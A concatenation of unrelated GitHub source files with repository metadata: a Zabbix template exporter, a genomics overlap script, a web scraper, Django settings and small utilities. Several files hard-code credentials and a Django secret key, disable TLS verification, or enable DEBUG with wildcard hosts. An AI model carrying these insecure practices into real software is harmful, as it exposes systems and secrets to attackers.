    # Login: returns the auth token issued by Zabbix.
    def user_login(self):
        data = self.json_obj(method="user.login",auth=False,params={"user":self.user,"password":self.password})
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        req = req.json()['result']
        return req
    # Logout: invalidates the given auth token.
    def user_logout(self,auth):
        # auth = self.user_login()
        print('********退出模块,认证id',auth)
        data = self.json_obj(method="user.logout",auth=auth,params={})
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        if req.json()['result'] == True:
            print('退出成功')
        else:
            print('退出失败')
        return req.text
    # Fetch the names and ids of all templates.
    def all_template_get(self,auth=True):
        print('all_template_get获取到认证id',auth)
        data = self.json_obj(method="template.get",auth=auth,
                        params={
                            "output": [
                                "host",
                                "templateid"
                            ]
                        })
        req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
        print(req.json()['result'])
        # self.user_logout(auth=auth)
        # The return value is an array of {host, templateid} dicts.
        return req.json()['result']
    # Export every template as an importable XML file.
    def all_template_xml(self,auth):
        # auth = self.user_login()
        all_template_get = self.all_template_get(auth=auth)
        for tempalte in all_template_get:
            template_name = tempalte['host']
            template_id = str(tempalte['templateid'])
            print('*********模板名字:%s, id:%s' % (template_name, template_id))
            data = self.json_obj(method="configuration.export",auth=auth,
                            params={
                                "options":{
                                    "templates": [
                                        template_id
                                    ]
                                },
                                "format": "xml"
                            })
            req = requests.post(url=self.url,headers=self.header,data=data,verify=False).json()
            req = req['result']
            # Append the exported XML to "<template name>.xml" in the cwd.
            myxml = open(template_name+'.xml',mode='a',encoding='utf-8')
            print(req,file=myxml)
            myxml.close()
            print(req)
        print('****************all_template_xml获取到的auth',auth)
if __name__ == '__main__':
    # Connection parameters for the Zabbix JSON-RPC endpoint.
    api_url = 'http://192.168.20.180/zabbix/api_jsonrpc.php'
    json_header = {'Content-Type': 'application/json'}
    account = 'Admin'
    secret = 'zabbix'
    # Log in, export every template to an .xml file, then log out.
    token = Zabbix(api_url, json_header, account, secret).user_login()
    print(token)
    Zabbix(api_url, json_header, account, secret).all_template_xml(token)
    Zabbix(api_url, json_header, account, secret).user_logout(token)
|
[
"noreply@github.com"
] |
Aqumik.noreply@github.com
|
bf23ff1ffbc40cacf8ba103e621f8ad641cd675f
|
1996a67d2a281706e9c141797e1813fc1b3612a7
|
/python/DNaseOverlap.py
|
b09fff46d97b9d18962c390ab47500ba50aaaf75
|
[] |
no_license
|
pjshort/SingletonMetric
|
91076a9976cc45a4ddf5f0750b20b7c46b7f1f5a
|
dc9af500c928b9d5b94aa75bc4b609e3feffe956
|
refs/heads/master
| 2021-01-10T06:20:49.350579
| 2016-03-07T11:12:25
| 2016-03-07T11:12:25
| 49,203,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import pysam
import argparse
import sys
import os
def get_options():
    """Parse and return this script's command-line options."""
    arg_parser = argparse.ArgumentParser(description="Get CADD scores for set of alleles.")
    arg_parser.add_argument("--variants", default="/path/to/input/variants",
                            help="location of variants in chr\tpos\tref\talt (minimal vcf) format")
    arg_parser.add_argument("--variants_out", default=sys.stdout,
                            help="path to send the list of variants with DNASE overlap binary values.")
    arg_parser.add_argument("--roadmap_epigenome_ids", default=["E002", "E010", "E053", "E072", "E081", "E082", "E083"],
                            help="list of roadmap epigenome project ideas in form E###.")
    return arg_parser.parse_args()
def get_variants(variants_path):
    """Read a minimal-VCF file (tab-separated chr, pos, ref, alt with a
    header row) and return four parallel lists; positions come back as ints."""
    chroms, positions, refs, alts = [], [], [], []
    with open(variants_path, "r") as handle:
        handle.readline()  # skip the header
        for record in handle:
            fields = record.split("\t")
            chroms.append(fields[0])
            positions.append(int(fields[1]))
            refs.append(fields[2])
            alts.append(fields[3].rstrip())
    return chroms, positions, refs, alts
def check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR):
    """For each variant, emit 1 when its position overlaps a DNase peak in
    the tabix-indexed BED for epigenome *id*, else 0 (ref/alt are unused)."""
    tabixfile = pysam.Tabixfile(TABIX_DIR + "regions_enh_%s.bed.gz" % id)  # e.g. E081 is male fetal brain
    flags = []
    for chrom, position, _ref, _alt in zip(chr, pos, ref, alt):
        records = tabixfile.fetch("chr" + chrom, position - 1, position)
        flags.append(1 if list(records) else 0)
    return flags
if __name__ == "__main__":
args = get_options()
chr, pos, ref, alt = get_variants(args.variants)
TABIX_DIR = "/lustre/scratch113/projects/ddd/users/ps14/REP/"
try:
id_list = [line.rstrip() for line in open(args.roadmap_epigenome_ids)]
except NameError:
pass # take default (brain and brain developmental tissues)
overlap_list = []
i = 0
for id in id_list:
if not os.path.isfile("/lustre/scratch113/projects/ddd/users/ps14/REP/regions_enh_%s.bed.gz" % id):
print "No DNase Peaks for %s. Skipping and moving to the next tissue." % id
id_list.pop(i)
continue
print "Intersecting parental alleles with %s DNase peaks." % id
overlap = check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR)
overlap_list.append(overlap)
i += 1
myvariants = open(args.variants, "r")
variant_header = myvariants.readline().rstrip()
variants = myvariants.readlines()
#lines = [variants] + overlap_list
myfile = open(args.variants_out, 'w')
# write header
header = variant_header + "\t" + "\t".join(id_list) + "\n"
myfile.write(header)
# write lines
i = 0
for overlaps in zip(*overlap_list): # the * unpacks the list of lists
var = variants[i].rstrip()
myfile.write(var + "\t" + "\t".join(str(o) for o in overlaps) + "\n")
i += 1
print 'Finished!'
|
[
"pjshort42@gmail.com"
] |
pjshort42@gmail.com
|
e6c4f39cad3a7e6cc5c02477d45d515ac44f6b5b
|
060ff392f361e4141d7d2add4282cd8ec67d055d
|
/musify/asgi.py
|
bc02da036c98fd237532dccce5998c699977136b
|
[] |
no_license
|
omlondhe/ReactDjango-MusifyApp
|
cfe61d85bccd583a2b7658f33b234869af008143
|
4fe3a18b2a425df0a860dcbb572b3a51227779e9
|
refs/heads/main
| 2023-02-06T01:54:31.279052
| 2020-12-28T17:51:31
| 2020-12-28T17:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
ASGI config for musify project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'musify.settings')
application = get_asgi_application()
|
[
"oplondhe@gmail.com"
] |
oplondhe@gmail.com
|
044b8d3b432a0465426ab35095611881bb8b52c6
|
3fd76a49e0cb7dedd0113abc9fe25d49c96c7610
|
/demo01.py
|
d6d8258fd3c34de89cf6138bf25e91de3f42e6dd
|
[] |
no_license
|
SnowSuo/python
|
4fd51a970139a1eff0097a03534af40e091f3497
|
bbf6691efdfaacd93d674160dc2cd3a03f3e9f6e
|
refs/heads/master
| 2021-07-02T09:10:50.063051
| 2018-06-19T12:49:31
| 2018-06-19T12:49:31
| 130,447,868
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
#-*- coding:utf-8 -*-
'''
=============================
Scrape the Douban Books Top 250 chart and persist the collected data
as a JSON file.
@copyright:Chinasoft international .ETC
@author:SnowSuo
@date:2018-05-02
'''
# imports
import urllib.request
import re
import os
import json

# Fetch the chart page
url = 'https://book.douban.com/top250?icn=index-book250-all'
response = urllib.request.urlopen(url)
content = response.read().decode('utf-8')

# Regular expressions that carve out the fields we need
regcontent = re.compile(r'<tr class="item">(.*?)</tr>', re.S)
regTitle = re.compile(r'<div class="pl2"><a.*?title="(.*?)">')
regLinks = re.compile(r'<a href="(.*?)".*?>')
regRatings = re.compile(r'<span class="rating_nums">(.*?)</span>')
regprice = re.compile(r'<p class="pl">(.*?)</p>')
lstcontent = regcontent.findall(content)

# List that accumulates one dict per book record
data = []
# Whitespace-collapsing pattern is loop-invariant: compile it once, outside.
regExp = re.compile(r'[\s\n]{2,}')
for item in lstcontent:
    # Strip redundant whitespace runs from the record's HTML.
    # BUG FIX: this assignment was commented out, leaving `blockcode`
    # undefined and crashing the loop with a NameError.
    blockcode = regExp.sub('', item)
    # Dict holding the record's fields (title, link, rating, author/price)
    dictbook = {}
    # Book title(s)
    lstTitle = regTitle.findall(blockcode)
    print(lstTitle)
    dictbook['title'] = lstTitle
    # Book link(s)
    lstLink = regLinks.findall(blockcode)
    print(lstLink)
    dictbook['link'] = lstLink
    # Rating
    lstRating = regRatings.findall(blockcode)
    print(lstRating)
    dictbook['rating'] = lstRating
    # Author and price line (printed but not stored, as before)
    lstPrice = regprice.findall(blockcode)
    print(lstPrice)
    # Append the assembled record
    data.append(dictbook)
    print('='*30)

# Directory for the JSON output.
dataDir = os.path.join(os.getcwd(), '.vscode/模块编程/data')
if not os.path.exists(dataDir):
    # makedirs (not mkdir) so missing parent directories are created too.
    os.makedirs(dataDir)
# Serialize the records to the JSON file (keep non-ASCII readable).
with open(dataDir+os.sep+'bookdata.json', 'w', encoding='utf-8') as jsonfile:
    json.dump(data, jsonfile, ensure_ascii=False)
print('>>>>json文件写入完毕')
|
[
"yonggang.suo@hotmail.com"
] |
yonggang.suo@hotmail.com
|
92208027272a6e16363b60e6e399cc6ec08fcbb5
|
f3d757f421497e19f2de0d3be21b9ae381511577
|
/phoneconfirmation/urls.py
|
57e758f3e36f49419e6051dbeed37811f6ed3296
|
[
"MIT"
] |
permissive
|
pinax/pinax-phone-confirmation
|
526ba350a5bbaaa58f229fad224cf9db41f5bcbc
|
102d997db0a7cc00bd862a94987338c25ba24f98
|
refs/heads/master
| 2023-06-22T15:57:32.364754
| 2019-04-11T23:59:58
| 2019-04-11T23:59:58
| 22,494,944
| 12
| 3
|
MIT
| 2019-04-11T23:46:54
| 2014-08-01T04:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 369
|
py
|
from django.conf.urls import url, patterns
# URL routes for the phoneconfirmation app; views are given as strings
# resolved against the "phoneconfirmation.views" prefix.
# NOTE(review): patterns() and string view references were removed in
# Django 1.10 -- this module only runs on older Django releases.
urlpatterns = patterns(
    "phoneconfirmation.views",
    url(r"^$", "phone_list", name="phone_list"),
    url(r"^confirm_phone/(\w+)/$", "confirm_phone", name="phone_confirm"),
    url(r"^action/$", "action", name="phone_action"),
    url(r"^get-country-for-code/$", "get_country_for_code", name="get_country_for_code")
)
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
4450e3282bc9a86c113545d0d5972bb6830b3915
|
25176b716df2bd519703c6e3cbc761d1b8b192c1
|
/src/app/interfaces/redis.py
|
a5133a0dc8d716666dec6fb805c35b0bedf27523
|
[] |
no_license
|
kain-jy/python-clean-architecture
|
74521d411b1d53f007e80e74c8abe5c64591d321
|
a5365818026a6b4da47dae64b099c1de5c8b5005
|
refs/heads/master
| 2020-04-21T00:03:13.797032
| 2019-02-05T03:22:24
| 2019-02-05T03:24:26
| 169,184,834
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
import json
import redis
from .. import usecases
class UserRedisRepository(usecases.UserRepository):
def __init__(self, url):
self.client = redis.from_url(url, decode_responses=True)
def list_user(self):
ret = []
for k in self.client.keys('user:*'):
user = usecases.load_user(json.loads(self.client.get(k)))
ret.append(user)
return ret
def find_user(self, user_id):
payload = self.client.get('user:{}'.format(user_id))
if not payload:
return None
return usecases.load_user(json.loads(payload))
def upsert_user(self, user):
self.client.set("user:{}".format(user.id), json.dumps(user.dump()))
def delete_user(self, user):
self.client.delete("user:{}".format(user.id))
|
[
"me@kain-jy.com"
] |
me@kain-jy.com
|
87a8307caea5976b9dea43adb38dbb519f275bcd
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/jakub/nonlocal_averaging/2d_rotation.py
|
44dd801a3538e23552901d09a1db0e020abcbe31
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 5,857
|
py
|
from ibvpy.api import \
TStepper as TS, RTraceGraph, TLoop, \
TLine, BCDof, IBVPSolve as IS, DOTSEval, FEDomain, FERefinementGrid,\
FEGrid, BCSlice
from apps.scratch.jakub.mlab.mlab_trace import RTraceDomainListField
from ibvpy.mats.mats2D.mats2D_sdamage.mats2D_sdamage import MATS2DScalarDamage
from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic
from ibvpy.mats.mats2D.mats2D_sdamage.strain_norm2d import Euclidean, Mazars, Rankine
from ibvpy.fets.fets2D.fets2D4q import FETS2D4Q
from ibvpy.fets.fets2D.fets2D4q9u import FETS2D4Q9U
from ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U
from averaging import UniformDomainAveraging, LinearAF, QuarticAF
from numpy import array, cos, sin, pi,sqrt, deg2rad, arctan
from mathkit.mfn.mfn_line.mfn_line import MFnLineArray
from ibvpy.dots.avg_fn import AveragingFunction, LinearAF,QuarticAF
def app():
    """Assemble and run a 2-D finite-element study with ibvpy.

    Builds a scalar-damage and an elastic 2-D material model, meshes a
    2x1 domain with 20x10 nine-node quad elements under quartic nonlocal
    averaging, prescribes corner displacements derived from a small
    rotation angle, runs the time loop, and finally opens the IBVPy UI.
    """
    # Scalar-damage material. NOTE(review): ``mp`` is constructed but never
    # used below — ``fets_eval`` is fed the elastic model ``me``; confirm
    # which material this study was meant to run with.
    mp = MATS2DScalarDamage(E = 1.,
                            nu = 0.2,
                            epsilon_0 = 1.e-3,
                            epsilon_f = 5.e-3,
                            #stiffness = "algorithmic",
                            stress_state = "plane_strain",
                            stiffness = "secant",
                            strain_norm = Euclidean())
    me = MATS2DElastic(E = 34e3,
                       nu = 0.,
                       stress_state  = "plane_strain")
    fets_eval = FETS2D4Q9U(mats_eval = me, ngp_r = 3, ngp_s = 3)
    # Discretization
    fe_domain = FEDomain()
    fe_level1 = FERefinementGrid( domain = fe_domain,
                                  fets_eval = fets_eval,
                                  averaging = QuarticAF(radius = 0.25,
                                                        correction = True))
    fe_grid = FEGrid( #coord_min = (-1.,-.5,0.),
                      coord_max = (2.,1.,0.),
                      shape   = (20,10),
                      fets_eval = fets_eval,
                      level = fe_level1 )
    # Piecewise-linear time function ramping the BC amplitude (0 -> 1 -> 1).
    mf = MFnLineArray( #xdata = arange(10),
                       ydata = array([0,1,1]) )
    # Rotation geometry: half-angle trig terms and the diagonal of the 2x1
    # domain, used to express the rotated corner positions below.
    angle = 2.#[deg]
    angle_r = deg2rad(angle)
    s_angle = sin(angle_r/2.)
    c_angle = cos(angle_r/2.)
    l_diag = sqrt(5.)
    d_angle = arctan(0.5)
    s_diag = sin((angle_r+d_angle))
    c_diag = cos((angle_r+d_angle))
    ts = TS(sdomain = fe_domain,
             # conversion to list (square brackets) is only necessary for slicing of
             # single dofs, e.g "get_left_dofs()[0,1]" which elsewise retuns an integer only
             bcond_list =  [
                # constraint for all left dofs in y-direction:
                BCSlice(var='u', slice = fe_grid[0,0,0,0],dims=[0,1], value = 0.),
                BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[1],
                        time_function = mf.get_value, value = 2*s_angle*2*c_angle),
                BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[0],
                        time_function = mf.get_value, value = - 2*s_angle**2*2),
                BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[0],
                        time_function = mf.get_value, value = - 1*s_angle*2*c_angle),
                BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[1],
                        time_function = mf.get_value, value = - 1*s_angle**2*2),
                BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [1],
                        time_function = mf.get_value, value = s_diag*l_diag - 1.),
                BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [0],
                        time_function = mf.get_value, value = c_diag*l_diag - 2.)
                           ],
             rtrace_list =  [
#                             RTraceGraph(name = 'Fi,right over u_right (iteration)' ,
#                                   var_y = 'F_int', idx_y = right_dof,
#                                   var_x = 'U_k', idx_x = right_dof,
#                                   record_on = 'update'),
                        RTraceDomainListField(name = 'Deformation' ,
                                       var = 'eps', idx = 0,
                                       record_on = 'update'),
                         RTraceDomainListField(name = 'Displacement' ,
                                        var = 'u', idx = 1,
                                        record_on = 'update',
                                        warp = True),
                         RTraceDomainListField(name = 'Damage' ,
                                        var = 'omega', idx = 0,
                                        record_on = 'update',
                                        warp = True),
#                             RTraceDomainField(name = 'Stress' ,
#                                        var = 'sig', idx = 0,
#                                        record_on = 'update'),
#                            RTraceDomainField(name = 'N0' ,
#                                       var = 'N_mtx', idx = 0,
#                                       record_on = 'update')
                    ]
            )
    # Add the time-loop control
    # (two load steps from t=0 to t=2 with a 1e-4 convergence tolerance)
    tl = TLoop( tstepper = ts,
                tolerance = 1.e-4,
                tline  = TLine( min = 0.0,  step = 1., max = 2.0 ))
    tl.eval()
    # Put the whole stuff into the simulation-framework to map the
    # individual pieces of definition into the user interface.
    #
    from ibvpy.plugins.ibvpy_app import IBVPyApp
    ibvpy_app = IBVPyApp( ibv_resource = ts )
    ibvpy_app.main()
if __name__ == '__main__':
    app()
|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
8c5c25cee31f3dd1e619b8efc727a8ddf6ab0d55
|
0a3a67da5fe86829b61518827b104e82a887f8a9
|
/Create_Insert_Read_Update.py
|
fbe88c5990a7e7e04aad81215131e7f6927f9e75
|
[] |
no_license
|
heeba14/Database_Programing
|
080f50520bc24a1d3c1d8791614c90dc27ea449a
|
b995db179d3edf471429f7d7f0e465392534e02d
|
refs/heads/master
| 2021-04-29T22:53:36.891819
| 2018-02-24T18:09:29
| 2018-02-24T18:09:29
| 121,646,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
import pymysql
# Module-level connection shared by every function below
# (host, user, password, database).
# NOTE(review): credentials are hard-coded — move them to environment
# variables or a config file before sharing this script.
db = pymysql.connect("localhost", "root", "mysql123", "python")
"""Create Table"""
def create_table():
    """Create the ``Number`` table on the module-level connection ``db``.

    NOTE(review): the sibling insert/read/update helpers all target a
    ``Profile`` table, not ``Number`` — confirm which schema is current.
    """
    cur = db.cursor()
    ddl = """CREATE TABLE Number (
             FIRST_NAME  TEXT NOT NULL,
             LAST_NAME  TEXT,
             AGE INT )"""
    cur.execute(ddl)
"""Insert Table"""
def insert_table():
    """Insert one hard-coded row into ``Profile`` and commit.

    Rolls back on a database error. Fix: the original used a bare
    ``except:``, which also swallows KeyboardInterrupt/SystemExit; only
    database errors should trigger the rollback.
    """
    cursor = db.cursor()
    sql = """INSERT INTO Profile(FIRST_NAME,
       LAST_NAME, AGE)
       VALUES ('Heeba', 'Kawoosa', 24)"""
    try:
        cursor.execute(sql)
        db.commit()
    except pymysql.Error:
        # Undo the partial statement; non-database exceptions propagate.
        db.rollback()
""" Read Table """
def read_table():
    """Print and return all rows of ``Profile``.

    Fixes: the bare ``except:`` is narrowed to ``pymysql.Error`` (a bare
    except also hides programming errors such as NameError), and the
    fetched rows are now returned so callers can use them (previously the
    function always returned None — backward compatible).
    """
    cursor = db.cursor()
    sql = '''SELECT * FROM Profile'''
    try:
        cursor.execute(sql)
        results = cursor.fetchall()
        print(results)
        return results
    except pymysql.Error:
        print("Error: unable to fetch data")
""" Update Table """
def update_table():
    """Decrement the AGE of every ``Profile`` row named 'Heeba', then commit.

    Rolls back on a database error. Fix: the original bare ``except:`` is
    narrowed to ``pymysql.Error`` so unrelated exceptions still surface.
    """
    cursor = db.cursor()
    sql = """UPDATE Profile SET AGE = AGE -1
                         WHERE First_name = 'Heeba'"""
    try:
        cursor.execute(sql)
        db.commit()
    except pymysql.Error:
        db.rollback()
# Demo driver: run each CRUD step once against the shared connection, then
# close it. NOTE(review): this executes at import time — guard it with
# ``if __name__ == '__main__':`` if the module is ever imported elsewhere.
create_table()
insert_table()
read_table()
update_table()
db.close()
|
[
"heebakawoos93@gmail.com"
] |
heebakawoos93@gmail.com
|
58bf50dfa1ff9df3fb85f9ea8137e332a7d6b16b
|
913874feee8362473286fd29a2697958d87098c0
|
/testcases/venv/bin/easy_install-3.6
|
6ed6ca7c2fd76d56fa7e9cf006bddac55cf0f8ef
|
[] |
no_license
|
Linestro/transpy
|
2a3d3c011ec746f23bdf5b4c93f1762cc5ac2ae5
|
ea1d93df8dd0c1fa77f0d1cbd34efe719d7a20f9
|
refs/heads/master
| 2020-05-25T00:37:49.305807
| 2019-05-17T19:43:06
| 2019-05-17T19:43:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
6
|
#!/home/hxzhu/Documents/sdh_mono-master/testcases/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
# Auto-generated setuptools console-script shim (do not edit by hand):
# strips the "-script.py"/".exe" suffix from argv[0], then dispatches to
# the pinned 'easy_install-3.6' entry point.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
    )
|
[
"hxzhu@umich.edu"
] |
hxzhu@umich.edu
|
7e5bdb95eceb8d543706dd352ce4101905da500f
|
95c71453ed6cc6f9b94f38a3c1655680618d71a4
|
/kickstart/DE/EC.py
|
477f7b6f874fc7fe1f0ee7f7bd160a909212de3b
|
[] |
no_license
|
ZX1209/gl-algorithm-practise
|
95f4d6627c1dbaf2b70be90149d897f003f9cb3a
|
dd0a1c92414e12d82053c3df981897e975063bb8
|
refs/heads/master
| 2020-05-16T14:56:34.568878
| 2019-12-27T07:37:11
| 2019-12-27T07:37:11
| 183,116,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
from collections import Counter
def isOdd(n):
    """Return 1 when *n* is odd, 0 when it is even."""
    return n % 2
def sortl(ls):
    """Return the sub-lists of *ls* ordered by their sums, largest first.

    Ties keep their original relative order: sorted() is stable, matching
    the previous Counter.most_common()-based implementation exactly.
    Idiom fix: the index-keyed Counter machinery is replaced by a single
    stable sort keyed on ``sum``.
    """
    return sorted(ls, key=sum, reverse=True)
def rate(lhu, lla):
    """Return the fraction of (hu, la) pairs with hu > la.

    Compares every element of *lhu* against every element of *lla* and
    returns wins / total comparisons; 0.0 when either list is empty.

    Bug fixed: the original returned the undefined name ``wi`` (a
    NameError on every call); it now returns the computed win rate.
    """
    win = 0
    total = 0
    for hu in lhu:
        for la in lla:
            total += 1
            if hu > la:
                win += 1
    # Guard the empty case instead of raising ZeroDivisionError.
    return win / total if total else 0.0
def dfs():
    """Unimplemented search stub.

    Bug fixed: the original line ``def dfs()`` was missing its colon and
    body — a SyntaxError that prevented the whole module from importing.
    Kept as an explicit no-op so the file parses; fill in when the search
    is actually written.
    """
    # la win >=
    # hu win >
    return None
def solve_EC(N, hu, la):
    """Return the fraction of positions i in [0, 3N) where hu[i] > la[i].

    Bug fixed: a dangling bare ``while`` keyword (a SyntaxError that broke
    the whole module) was removed. Everything else is kept as written.

    NOTE(review): ``hu`` is sorted in place (mutates the caller's list) but
    ``la`` is compared in its original order, and the window sums ``lla``
    are computed yet never used — this looks like an unfinished solution;
    confirm the intended algorithm before trusting the result.
    """
    # Sliding-window sums of ``la`` — computed by the original author but
    # never consumed below; kept for reference.
    lla = [sum(la[i:i + N]) for i in range(N)]
    win = 0
    lla.sort()
    hu.sort()
    for i in range(3 * N):
        if hu[i] > la[i]:
            win += 1
    return win / (3 * N)
def main():
    """Driver: read T test cases from stdin and print 'Case #k: <answer>'.

    Each case is three lines: N, then the hu values, then the la values.
    """
    T = int(input())
    for t in range(T):
        tmp = input().split()
        tmp = list(map(int, tmp))
        # Single-value unpack: the first case line carries only N.
        N, = tmp
        tmp = input().split()
        tmp = list(map(int, tmp))
        hu = tmp
        tmp = input().split()
        tmp = list(map(int, tmp))
        la = tmp
        print('Case #' + str(t + 1) + ': ', end='')
        print(solve_EC(N, hu, la))
if __name__ == '__main__':
    main()
|
[
"1404919041@qq.com"
] |
1404919041@qq.com
|
4b7ffa1ba61b1b2c13a7c33cbe25688ed235e748
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.BAX/Mono_16/pdf_to_json_test_Latn.BAX_Mono_16.py
|
419f2ec7b49e7c247dfa03dc2764cd5ebdafafec
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
import pdf_to_json as p2j
import json
# Convert one UDHR sample PDF (Latn script, BAX language, Mono 16pt) to a
# JSON structure and pretty-print it. mImageHashOnly keeps only image
# hashes in the output rather than embedding image data.
url = "file:data/multilingual/Latn.BAX/Mono_16/udhr_Latn.BAX_Mono_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
20821475d51ca2148fae3ad69aa416f7dfa372ce
|
87cb949ba0e4159cf698280f241590442d1ea62b
|
/airflow_pipeline/extract_entities_debug.py
|
607b57a327608e2238f91ebac1d67a81d2d4d50c
|
[] |
no_license
|
ePlusPS/emr-workflow
|
000fea60563be659d4df266b873bea32713c1b9f
|
f894d353f647feb8c1ce30083d91d5e070b7d6c6
|
refs/heads/main
| 2023-08-10T07:48:35.904011
| 2020-08-21T00:32:12
| 2020-08-21T00:32:12
| 233,957,297
| 0
| 3
| null | 2023-07-25T15:11:32
| 2020-01-14T23:37:03
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
from create_entity_columns import extract_entities
# Debug smoke test: feed one BIO-tagged string through the entity extractor.
extract_entities('asdf[B-MEDICATION] asdfasdf[B-FEATURE]')
|
[
"Morgan.Worthington@eplus.com"
] |
Morgan.Worthington@eplus.com
|
758db4b99719e367115109a9db0ff573624e2909
|
928e46c6f6553fe285645c3a61fb8b6ec1c27020
|
/website/website/settings.py
|
ff58740173b0a59efcb0ff5e9dbd86e52d7ae605
|
[] |
no_license
|
aureatemandala/The-Pavilion-of-Dreams
|
06ab1be2490639cd6f16022e8d76e449f290632f
|
7e3dcbabfc304500750273fb5cca5392d1416158
|
refs/heads/master
| 2022-12-31T10:41:36.345352
| 2020-10-25T13:51:38
| 2020-10-25T13:51:38
| 272,225,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,460
|
py
|
"""
Django settings for website project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'hws4725ktt-!ad#or+tw!h9jk0*gf9u45#07qb_id_56!@9lmy'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'dreams',
'ckeditor',
'ckeditor_uploader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'website.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates').replace('\\','/')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'website.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'djdb',
'USER': 'nimrod',
'PASSWORD': '123456',
'HOST': '127.0.0.1',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
